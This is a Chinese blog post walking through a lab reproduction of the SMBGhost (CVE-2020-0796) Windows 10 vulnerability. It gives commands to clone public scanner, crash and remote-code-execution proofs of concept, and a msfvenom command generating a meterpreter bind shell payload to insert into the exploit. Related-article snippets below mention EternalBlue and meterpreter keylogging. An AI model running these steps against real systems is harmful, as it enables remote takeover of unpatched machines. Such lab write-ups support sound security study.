win10永恒之黑漏洞复现

最新推荐文章于 2024-07-21 19:01:12 发布
最新推荐文章于 2024-07-21 19:01:12 发布
阅读量1.5k 收藏 20
点赞数 3
文章标签: python 网络安全 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bmxch/article/details/113522842
版权

漏洞检测
检测工具:https://github.com/ollypwn/SMBGhost

先下载
git clone https://github.com/ollypwn/SMBGhost
进入工具目录
cd SMBGhost/
用python3调用scanner.py
python3 scanner.py 192.168.28.135
在这里插入图片描述

靶机192.168.28.135自身确实存在漏洞。

漏洞攻击
poc:https://github.com/eerykitty/CVE-2020-0796-PoC

先获取工具
git clone https://github.com/eerykitty/CVE-2020-0796-PoC

进入工具目录
cd CVE-2020-0796-PoC/

Pip3下载依赖工具
pip3 install ntlm_auth
在这里插入图片描述

靶机蓝屏
在这里插入图片描述

0X05 getshell
脚本下载:.
Git clone https://github.com/chompie1337/SMBGhost_RCE_PoC
在这里插入图片描述

生成反向连接木马
本地端口可以随意指定 -f 文件类型 -o目标文件名
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -f py -o nb.py

用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)

白帽小丑
关注
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透测试是一种重要的网络安全评估方法...对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至关重要。同时,测试报告的编写也是整个过程的成果展示,为防御者提供了改进安全策略的依据。
【tools】Meterpreter 操作汇总
热门推荐
qq_21193587的博客
06-04 3万+
Meterpreter 介绍 Meterpreter 号称“客瑞士军刀”,Meterpreter 是 Metasploit 框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后能够返回一个我们控制通道,例如利用远程过程带哦用 RPC 服务的一个漏洞,当漏洞被触发后,我们选择 Meterpreter 作为攻击载荷,就能够获得目标系统上的一个 Meterpreter Shell 连接。Meterpreter 是 Metasploit 框架的一个扩展模块,可以调用 Metasploit 的
永恒永恒之蓝 漏洞解析及复现
黑战士的博客
02-21 1578
充当攻击机的机器是kali,另外需要关闭防火墙策略。
这个工具扫一扫,就能看你电脑能不能蓝屏
liguangyao213的博客
07-21 406
下面是来自ABC_123原创的针对微软远程溢出的漏洞的验证工具(工具仅用于技术研究,不得用于其他不合规行为。昨天,微软让的大批量蓝屏,让很多人提前回家过周末了,这不仅让2017年5月12日的“永恒之蓝”又浮现出来了。马上开始的2024Hvv,难不成微软的day会成为最大的0day?添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)
CVE-2020-0796 漏洞检测及利用工具
06-08 2万+
自2020年3月12日,微软正式发布CVE-2020-0796高危漏洞补丁后,时隔数月,远程利用PoC代码已经被公布,这也意味着这场漏洞风波即将告一段落了。本文汇总了多个CVE-2020...
乱下东西导致挖矿病毒Trojan,CoinMiner的解决记录
m0_53419552的博客
06-30 9972
乱下东西导致挖矿病毒Trojan,CoinMiner的解决记录
渗透测试常用工具-使用meterpreter模块进行后渗透测试
旺仔Sec&blog
10-24 1245
再然后使用命令keyscan_start对键盘进行监听,使用命令keyscan_dump保存截获的键盘信息(注:windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。第五步,使用info windows/meterpreter/reverse_tcp命令来查看攻击载荷模块的具体信息,该模块适用于Windows x86平台不需要admin权限便可以运行,大小为281字节,需要配置三个参数分别为退出的方式、监听的地址、监听的端口号、EXITFUNC。
永恒之蓝复现kaliwin7
07-19
### 恒之蓝漏洞复现:Kali Linux 攻击 Windows 7 #### 实验背景及目的 “永恒之蓝”(EternalBlue)是一种针对 Windows 操作系统的严重漏洞,该漏洞允许攻击者在无需用户交互的情况下实现远程代码执行。本次实验...
win2012R2永恒之蓝安全补丁.zip
05-12
网络安全领域,永恒之蓝(EternalBlue)是一个具有里程碑意义的漏洞,它曾被广泛利用于 WannaCry 勒索软件攻击中,对全球范围内的Windows系统造成了严重威胁。Windows Server 2012 R2作为微软的一款企业级服务器...
win 10 ISO 镜像文件之SXS
02-15
描述中提到的"Win10 多种方式解决无法安装.Net3.5的问题",是指在安装或启用.NET Framework 3.5时可能出现的困难。这个问题可能由多种原因引起,如网络连接问题、Windows Update服务未开启、ISO镜像文件不完整等。...
Windows 2008永恒之蓝漏洞利用与后渗透测试详解
最新发布
09-23
具体涉及nmap命令实施的端口和服务枚举以及利用永恒之蓝漏洞(MS17-010 EternalBlue)取得目标主机管理访问,最终展示了在已攻破的目标环境中进一步行动的步骤和技术手段。适用于希望了解Windows操作系统特定远程...
CVE-2020-0796 SMBGhost漏洞复现
whh6tl的博客
04-26 1973
CVE-2020-0796 SMBGhost漏洞复现漏洞简介漏洞影响范围利用环境漏洞复现:搭建环境攻击机:安装python3环境靶机:windows10 1903 x64位系统,关闭防火墙查看靶机IP使用攻击机查看靶机IP是否能ping通使用脚本检测漏洞配置攻击poc所需环境漏洞利用搭建好环境后运行poc靶机蓝屏,漏洞利用成功修复建议 漏洞简介 Microsoft Windows和Microso...
永恒永恒之蓝 完整复现流程
Continuejww的博客
09-19 1252
充当攻击机的机器是kali,另外需要关闭防火墙策略。
CVE-2020-0976永恒漏洞复现
qq_36918532的博客
03-13 4110
漏洞原理 SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受客攻击的目标系统只需开机在线即可能被入侵。 影响版本 Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标 漏洞所需工具 漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0
CVE-2020-0796_RCE(永恒漏洞exp复现
qq_29365787的博客
06-29 2093
一、漏洞介绍 Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞客可直接远程攻击SMB服务端远程执行任意恶意代码
python渗透测试入门之burpsuite载核生成器
ailx10
06-14 260
近期收到了电子工业出版社赠送的一本网络安全书籍《python帽子》,书中一共24个实验,今天复现第15个实验(burpsuite载核生成器插件),我的测试环境是mbp电脑+kali虚拟机+dvwa在线靶场。当前只支持python2.7的环境,稍微调整一下软链接,然后我把kali 上的jdk和burpsuite都卸载了,最后用的是jdk 1.8和burpsuite 1.7.36,成功复现了这个实验...
【Android 逆向】Android 逆向通用工具开发 ( PC 端工具 hacktool 启动 main 函数分析 | hacktool 工程中的核心类 HackCommand 分析 )
让 学习 成为一种 习惯 ( 韩曙亮 の 技术博客 )
11-07 1565
一、PC 端工具 hacktool 启动 main 函数分析、 二、PC 端工具 hacktool 工程中的核心类 HackCommand 分析
CVE-2020-0796 - SMBv3漏洞复现与提权
yangbz123的博客
06-06 4962
CVE-2020-0796 - SMBv3提权 微软发布安全公告,发布了一个最新的SMB远程代码执行漏洞( CVE-2020-0796 )“永恒”,攻击者可以利用漏洞进行提权实现代码执行。 提权准备工作 1、首先下载扫描器,进行检测 下载地址: https://github.com/ollypwn/SMBGhost python3 scanner.py <ip> 将Windows目标机的防火墙关闭,让攻击机可以ping通ip 可以看到 2、下载好可利用的POC https://gi
msf win10漏洞_永恒:CVE20200796漏洞复现
05-28
如果您想要了解如何复现 CVE-2020-0796(也称为“永恒漏洞),我可以为您提供一些指导。 首先,您需要具备一定的渗透测试技能和经验,因为该漏洞需要进行端口扫描、漏洞利用等操作,属于比较高级的渗透测试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽小丑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值